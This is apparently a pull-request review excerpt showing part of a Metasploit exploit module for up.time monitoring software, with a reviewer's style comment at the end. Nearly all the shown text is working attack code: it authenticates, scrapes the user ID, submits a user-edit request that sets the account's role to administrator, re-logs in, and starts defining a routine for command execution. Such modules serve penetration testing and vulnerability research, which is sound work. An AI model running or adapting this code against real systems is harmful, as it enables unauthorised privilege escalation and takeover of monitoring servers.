modules/exploits/multi/http/uptime_code_exec.rb

```diff
@@ -0,0 +1,331 @@
+      cookie_split = res_auth.get_cookies.split(';')
+      vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
+      print_good('Login success')
+
+      # Privilege escalation getting user ID
+      res_priv = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'main.php'),
+        'vars_get' => {
+          'page'          => 'Users',
+          'subPage'       => 'UserContainer'
+        },
+       'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
+      )
+      matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
+      get_id = matchdata[0].gsub(/[^\d]/, '')
+      vprint_status('Escalating privileges...')
+
+      # Privilege escalation post
+      res_priv_elev = send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, 'main.php'),
+        'vars_get' => {
+          'section'          => 'UserContainer',
+          'subsection'       => 'edit',
+          'id'               => "#{get_id}"
+        },
+        'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+        'vars_post' => {
+          'operation' => 'submit',
+          'disableEditOfUsernameRoleGroup' => 'false',
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'passwordConfirm' => datastore['PASSWORD'],
+          'firstname' => rand_text_alpha(10),
+          'lastname' => rand_text_alpha(10),
+          'location' => '',
+          'emailaddress' => '',
+          'emailtimeperiodid' => '1',
+          'phonenumber' => '',
+          'phonenumbertimeperiodid' => '1',
+          'windowshost' => '',
+          'windowsworkgroup' => '',
+          'windowspopuptimeperiodid' => '1',
+          'landingpage' => 'MyPortal',
+          'isonvacation' => '0',
+          'receivealerts' => '0',
+          'activexgraphs' => '0',
+          'newuser' => 'on',
+          'newuser' => '1',
+          'userroleid' => '1',
+          'usergroupid[]' => '1'
+        }
+      )
+
+      # Refresing perms
+      vprint_status('Refresing perms...')
+      res_priv = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
+        'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
+      )
+
+      res_auth = send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, 'index.php'),
+        'vars_post' => {
+          'username'          => datastore['USERNAME'],
+          'password'          => datastore['PASSWORD']
+        }
+      )
+      if !res_auth.nil? && res_auth.get_cookies =~ /login=true/
+        cookie = Regexp.last_match(1)
+        cookie_split = res_auth.get_cookies.split(';')
+        vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
+        print_good('Priv. Escalation success')
+      end
+
+      # CREATING EXEC Service
+
+      def create_exec_service(*args)
```

Comment:
Are you defining this method inside exploit :? 

If it's the case, please don't do that.